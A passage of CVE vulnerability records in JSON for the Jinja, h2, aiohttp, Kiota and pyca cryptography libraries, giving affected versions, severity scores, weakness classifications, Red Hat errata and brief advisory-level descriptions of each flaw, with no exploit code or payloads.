"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pallets/jinja/releases/tag/3.1.5"
}
],
"source": {
"advisory": "GHSA-q2x7-8rv6-6q7h",
"discovery": "UNKNOWN"
},
"title": "Jinja has a sandbox breakout through indirect reference to format method"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2024-56326",
"datePublished": "2024-12-23T15:43:49.400Z",
"dateReserved": "2024-12-19T18:34:22.764Z",
"dateUpdated": "2025-11-03T19:32:16.045Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-57804 (GCVE-0-2025-57804)
Vulnerability from cvelistv5 – Published: 2025-08-25 21:04 – Updated: 2025-11-03 18:13- CWE-93 - Improper Neutralization of CRLF Sequences ('CRLF Injection')
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
| Vendor | Product | Version | ||
|---|---|---|---|---|
| python-hyper | h2 |
Affected:
< 4.3.0
|
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-57804",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-08-26T19:14:14.359281Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-08-26T19:14:49.643Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-03T18:13:44.839Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"url": "https://lists.debian.org/debian-lts-announce/2025/09/msg00004.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "h2",
"vendor": "python-hyper",
"versions": [
{
"status": "affected",
"version": "\u003c 4.3.0"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "h2 is a pure-Python implementation of a HTTP/2 protocol stack. Prior to version 4.3.0, an HTTP/2 request splitting vulnerability allows attackers to perform request smuggling attacks by injecting CRLF characters into headers. This occurs when servers downgrade HTTP/2 requests to HTTP/1.1 without properly validating header names/values, enabling attackers to manipulate request boundaries and bypass security controls. This issue has been patched in version 4.3.0."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"privilegesRequired": "NONE",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "LOW",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:N/SI:L/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "NONE"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-93",
"description": "CWE-93: Improper Neutralization of CRLF Sequences (\u0027CRLF Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-08-25T21:04:52.642Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/python-hyper/h2/security/advisories/GHSA-847f-9342-265h",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/python-hyper/h2/security/advisories/GHSA-847f-9342-265h"
},
{
"name": "https://github.com/python-hyper/h2/commit/035e9899f95e3709af098f578bfc3cd302298e3a",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/python-hyper/h2/commit/035e9899f95e3709af098f578bfc3cd302298e3a"
}
],
"source": {
"advisory": "GHSA-847f-9342-265h",
"discovery": "UNKNOWN"
},
"title": "h2 allows HTTP Request Smuggling due to illegal characters in headers"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-57804",
"datePublished": "2025-08-25T21:04:52.642Z",
"dateReserved": "2025-08-20T14:30:35.009Z",
"dateUpdated": "2025-11-03T18:13:44.839Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-53643 (GCVE-0-2025-53643)
Vulnerability from cvelistv5 – Published: 2025-07-14 20:17 – Updated: 2025-07-15 19:50- CWE-444 - Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-53643",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-07-15T14:43:18.333063Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-07-15T19:50:40.717Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "aiohttp",
"vendor": "aio-libs",
"versions": [
{
"status": "affected",
"version": "\u003c 3.12.14"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. Prior to version 3.12.14, the Python parser is vulnerable to a request smuggling vulnerability due to not parsing trailer sections of an HTTP request. If a pure Python version of aiohttp is installed (i.e. without the usual C extensions) or AIOHTTP_NO_EXTENSIONS is enabled, then an attacker may be able to execute a request smuggling attack to bypass certain firewalls or proxy protections. Version 3.12.14 contains a patch for this issue."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "PRESENT",
"attackVector": "NETWORK",
"baseScore": 1.7,
"baseSeverity": "LOW",
"privilegesRequired": "NONE",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "LOW"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-444",
"description": "CWE-444: Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-07-14T20:17:18.247Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-9548-qrrj-x5pj",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-9548-qrrj-x5pj"
},
{
"name": "https://github.com/aio-libs/aiohttp/commit/e8d774f635dc6d1cd3174d0e38891da5de0e2b6a",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/aio-libs/aiohttp/commit/e8d774f635dc6d1cd3174d0e38891da5de0e2b6a"
}
],
"source": {
"advisory": "GHSA-9548-qrrj-x5pj",
"discovery": "UNKNOWN"
},
"title": "AIOHTTP is vulnerable to HTTP Request/Response Smuggling through incorrect parsing of chunked trailer sections"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-53643",
"datePublished": "2025-07-14T20:17:18.247Z",
"dateReserved": "2025-07-07T14:20:38.391Z",
"dateUpdated": "2025-07-15T19:50:40.717Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2026-44503 (GCVE-0-2026-44503)
Vulnerability from cvelistv5 – Published: 2026-05-14 15:58 – Updated: 2026-05-14 19:51- CWE-601 - URL Redirection to Untrusted Site ('Open Redirect')
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
| Vendor | Product | Version | |||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| microsoft | kiota-java |
Affected:
< 1.9.1
|
|||||||||||||||||||||||||||
|
|||||||||||||||||||||||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-44503",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-05-14T18:02:08.790490Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-05-14T19:51:10.682Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/microsoft/kiota-java/security/advisories/GHSA-7j59-v9qr-6fq9"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "kiota-java",
"vendor": "microsoft",
"versions": [
{
"status": "affected",
"version": "\u003c 1.9.1"
}
]
},
{
"product": "Microsoft.Kiota.Abstractions",
"vendor": "microsoft",
"versions": [
{
"status": "affected",
"version": "\u003c 1.22.0"
}
]
},
{
"product": "github.com/microsoft/kiota-http-go",
"vendor": "microsoft",
"versions": [
{
"status": "affected",
"version": "\u003c 1.5.5"
}
]
},
{
"product": "kiota-typescript",
"vendor": "microsoft",
"versions": [
{
"status": "affected",
"version": "\u003c 1.0.0-preview.100"
}
]
},
{
"product": "microsoft-kiota-abstractions",
"vendor": "microsoft",
"versions": [
{
"status": "affected",
"version": "\u003c 1.9.1"
}
]
},
{
"product": "microsoft-kiota-http",
"vendor": "microsoft",
"versions": [
{
"status": "affected",
"version": "\u003c 1.9.9"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "The RedirectHandler middleware in microsoft/kiota-java (com.microsoft.kiota:microsoft-kiota-http-okHttp v1.9.0) and other Kiota libraries fails to strip sensitive HTTP headers when following 3xx redirects to a different host or scheme. Only the Authorization header is removed; Cookie, Proxy-Authorization, and all custom headers are forwarded to the redirect target."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "PRESENT",
"attackVector": "NETWORK",
"baseScore": 7,
"baseSeverity": "HIGH",
"privilegesRequired": "NONE",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "HIGH",
"subIntegrityImpact": "NONE",
"userInteraction": "PASSIVE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "NONE"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-601",
"description": "CWE-601: URL Redirection to Untrusted Site (\u0027Open Redirect\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-14T15:58:57.772Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/microsoft/kiota-java/security/advisories/GHSA-7j59-v9qr-6fq9",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/microsoft/kiota-java/security/advisories/GHSA-7j59-v9qr-6fq9"
}
],
"source": {
"advisory": "GHSA-7j59-v9qr-6fq9",
"discovery": "UNKNOWN"
},
"title": "Kiota abstractions RedirectHandler leaks Cookie/Proxy-Authorization headers on cross-host redirect"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-44503",
"datePublished": "2026-05-14T15:58:57.772Z",
"dateReserved": "2026-05-06T18:28:20.886Z",
"dateUpdated": "2026-05-14T19:51:10.682Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-26007 (GCVE-0-2026-26007)
Vulnerability from cvelistv5 – Published: 2026-02-10 21:42 – Updated: 2026-07-01 12:04- CWE-345 - Insufficient Verification of Data Authenticity
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
| Vendor | Product | Version | ||
|---|---|---|---|---|
| pyca | cryptography |
Affected:
< 46.0.5
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2026-02-10T23:14:21.776Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"url": "http://www.openwall.com/lists/oss-security/2026/02/10/4"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-26007",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-02-11T21:28:38.864657Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-02-11T21:28:47.345Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"affected": [
{
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2.5::el8",
"cpe:/a:redhat:ansible_automation_platform_developer:2.5::el8",
"cpe:/a:redhat:ansible_automation_platform_inside:2.5::el8"
],
"defaultStatus": "affected",
"product": "Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2.5::el9",
"cpe:/a:redhat:ansible_automation_platform_developer:2.5::el9",
"cpe:/a:redhat:ansible_automation_platform_inside:2.5::el9"
],
"defaultStatus": "affected",
"product": "Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:enterprise_linux:8::appstream"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream (v. 8)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_e4s:9.2::appstream"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream E4S (v.9.2)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_eus:9.4::appstream"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_eus:9.6::appstream"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream EUS (v.9.6)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:enterprise_linux:9::appstream"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream (v. 9)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:enterprise_linux:8::highavailability"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux HighAvailability (v. 8)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_e4s:9.2::highavailability"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux High Availability E4S (v.9.2)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_eus:9.4::highavailability"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux High Availability EUS (v.9.4)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2.5::el8"
],
"defaultStatus": "affected",
"product": "Red Hat Ansible Automation Platform 2.5",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2.6::el9"
],
"defaultStatus": "affected",
"product": "Red Hat Ansible Automation Platform 2.6",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:discovery:2::el9"
],
"defaultStatus": "affected",
"product": "Red Hat Discovery 2",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:hummingbird:1"
],
"defaultStatus": "affected",
"product": "Red Hat Hardened Images",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_ai:2.25::el9"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift AI 2.25",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:quay:3.10::el8"
],
"defaultStatus": "affected",
"product": "Red Hat Quay 3.10",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:quay:3.15::el8"
],
"defaultStatus": "affected",
"product": "Red Hat Quay 3.15",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:quay:3.16::el9"
],
"defaultStatus": "affected",
"product": "Red Hat Quay 3.16",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:quay:3.9::el8"
],
"defaultStatus": "affected",
"product": "Red Hat Quay 3.9",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:satellite:6.18::el9"
],
"defaultStatus": "affected",
"product": "Red Hat Satellite 6.18",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:enterprise_linux:8::resilientstorage"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux ResilientStorage (v. 8)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_e4s:9.2::resilientstorage"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux Resilient Storage E4S (v.9.2)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_eus:9.4::resilientstorage"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux Resilient Storage EUS (v.9.4)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_lightspeed"
],
"defaultStatus": "affected",
"product": "OpenShift Lightspeed",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2"
],
"defaultStatus": "affected",
"product": "Red Hat Ansible Automation Platform 2",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_ai"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift AI (RHOAI)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:satellite:6"
],
"defaultStatus": "affected",
"product": "Red Hat Satellite 6",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:trusted_artifact_signer:1"
],
"defaultStatus": "affected",
"product": "Red Hat Trusted Artifact Signer",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:acm:2"
],
"defaultStatus": "unaffected",
"product": "Red Hat Advanced Cluster Management for Kubernetes 2",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:ansible_core:2"
],
"defaultStatus": "unaffected",
"product": "Red Hat Ansible Automation Platform Ansible Core 2",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/o:redhat:enterprise_linux:10"
],
"defaultStatus": "unaffected",
"product": "Red Hat Enterprise Linux 10",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/o:redhat:enterprise_linux:8"
],
"defaultStatus": "unaffected",
"product": "Red Hat Enterprise Linux 8",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/o:redhat:enterprise_linux:9"
],
"defaultStatus": "unaffected",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat"
}
],
"datePublic": "2026-02-10T21:42:56.471Z",
"descriptions": [
{
"lang": "en",
"value": "A validation flaw has been discovered in the python cryptography package. This missing validation allows an attacker to provide a public key point P from a small-order subgroup. This can lead to security issues in various situations, such as the most commonly used signature verification (ECDSA) and shared key negotiation (ECDH). When the victim computes the shared secret as S = [victim_private_key]P via ECDH, this leaks information about victim_private_key mod (small_subgroup_order). For curves with cofactor \u003e 1, this reveals the least significant bits of the private key. When these weak public keys are used in ECDSA , it\u0027s easy to forge signatures on the small subgroup. Only SECT curves are impacted by this."
}
],
"metrics": [
{
"other": {
"content": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"value": "Important"
},
"type": "Red Hat severity rating"
}
},
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-354",
"description": "Improper Validation of Integrity Check Value",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-07-01T12:04:53.754Z",
"orgId": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"shortName": "redhat-SADP"
},
"references": [
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/security/cve/CVE-2026-26007"
},
{
"name": "RHBZ#2438762",
"tags": [
"issue-tracking",
"x_refsource_REDHAT"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438762"
},
{
"tags": [
"x_sadp-csaf-vex"
],
"url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-26007.json"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:13512"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:12176"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:22330"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:21517"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:21431"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:13672"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:19355"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:6308"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:13553"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:13545"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:6309"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:2694"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:7295"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:10184"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:5665"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:6568"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:6497"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:6567"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:5168"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:22993"
}
],
"solutions": [
{
"lang": "en",
"value": "RHSA-2026:13512: Red Hat Ansible Automation Platform 2.5 for RHEL 8, Red Hat Ansible Automation Platform 2.5 for RHEL 9"
},
{
"lang": "en",
"value": "RHSA-2026:12176: Red Hat Enterprise Linux AppStream (v. 8), Red Hat Enterprise Linux HighAvailability (v. 8), Red Hat Enterprise Linux ResilientStorage (v. 8)"
},
{
"lang": "en",
"value": "RHSA-2026:22330: Red Hat Enterprise Linux AppStream E4S (v.9.2), Red Hat Enterprise Linux High Availability E4S (v.9.2), Red Hat Enterprise Linux Resilient Storage E4S (v.9.2)"
},
{
"lang": "en",
"value": "RHSA-2026:21517: Red Hat Enterprise Linux AppStream EUS (v.9.4), Red Hat Enterprise Linux High Availability EUS (v.9.4), Red Hat Enterprise Linux Resilient Storage EUS (v.9.4)"
},
{
"lang": "en",
"value": "RHSA-2026:21431: Red Hat Enterprise Linux AppStream EUS (v.9.6)"
},
{
"lang": "en",
"value": "RHSA-2026:13672: Red Hat Enterprise Linux AppStream (v. 9)"
},
{
"lang": "en",
"value": "RHSA-2026:19355: Red Hat Enterprise Linux AppStream (v. 9)"
},
{
"lang": "en",
"value": "RHSA-2026:6308: Red Hat Ansible Automation Platform 2.5"
},
{
"lang": "en",
"value": "RHSA-2026:13553: Red Hat Ansible Automation Platform 2.5"
},
{
"lang": "en",
"value": "RHSA-2026:13545: Red Hat Ansible Automation Platform 2.6"
},
{
"lang": "en",
"value": "RHSA-2026:6309: Red Hat Ansible Automation Platform 2.6"
},
{
"lang": "en",
"value": "RHSA-2026:2694: Red Hat Discovery 2"
},
{
"lang": "en",
"value": "RHSA-2026:7295: Red Hat Hardened Images"
},
{
"lang": "en",
"value": "RHSA-2026:10184: Red Hat OpenShift AI 2.25"
},
{
"lang": "en",
"value": "RHSA-2026:5665: Red Hat Quay 3.10"
},
{
"lang": "en",
"value": "RHSA-2026:6568: Red Hat Quay 3.15"
},
{
"lang": "en",
"value": "RHSA-2026:6497: Red Hat Quay 3.16"
},
{
"lang": "en",
"value": "RHSA-2026:6567: Red Hat Quay 3.16"
},
{
"lang": "en",
"value": "RHSA-2026:5168: Red Hat Quay 3.9"
},
{
"lang": "en",
"value": "RHSA-2026:22993: Red Hat Satellite 6.18"
}
],
"timeline": [
{
"lang": "en",
"time": "2026-02-10T22:01:01.036Z",
"value": "Reported to Red Hat."
},
{
"lang": "en",
"time": "2026-02-10T21:42:56.471Z",
"value": "Made public."
}
],
"title": "cryptography: cryptography Subgroup Attack Due to Missing Subgroup Validation for SECT Curves",
"workarounds": [
{
"lang": "en",
"value": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability."
}
],
"x_adpType": "supplier",
"x_generator": {
"engine": "sadp-cli 1.0.0"
}
}
],
"cna": {
"affected": [
{
"product": "cryptography",
"vendor": "pyca",
"versions": [
{
"status": "affected",
"version": "\u003c 46.0.5"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "cryptography is a package designed to expose cryptographic primitives and recipes to Python developers. Prior to 46.0.5, the public_key_from_numbers (or EllipticCurvePublicNumbers.public_key()), EllipticCurvePublicNumbers.public_key(), load_der_public_key() and load_pem_public_key() functions do not verify that the point belongs to the expected prime-order subgroup of the curve. This missing validation allows an attacker to provide a public key point P from a small-order subgroup. This can lead to security issues in various situations, such as the most commonly used signature verification (ECDSA) and shared key negotiation (ECDH). When the victim computes the shared secret as S = [victim_private_key]P via ECDH, this leaks information about victim_private_key mod (small_subgroup_order). For curves with cofactor \u003e 1, this reveals the least significant bits of the private key. When these weak public keys are used in ECDSA , it\u0027s easy to forge signatures on the small subgroup. Only SECT curves are impacted by this. This vulnerability is fixed in 46.0.5."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "HIGH",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"privilegesRequired": "NONE",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "NONE"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-345",
"description": "CWE-345: Insufficient Verification of Data Authenticity",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-02-10T21:42:56.471Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/pyca/cryptography/security/advisories/GHSA-r6ph-v2qm-q3c2",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/pyca/cryptography/security/advisories/GHSA-r6ph-v2qm-q3c2"
},
{
"name": "https://github.com/pyca/cryptography/commit/0eebb9dbb6343d9bc1d91e5a2482ed4e054a6d8c",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pyca/cryptography/commit/0eebb9dbb6343d9bc1d91e5a2482ed4e054a6d8c"
}
],
"source": {
"advisory": "GHSA-r6ph-v2qm-q3c2",
"discovery": "UNKNOWN"
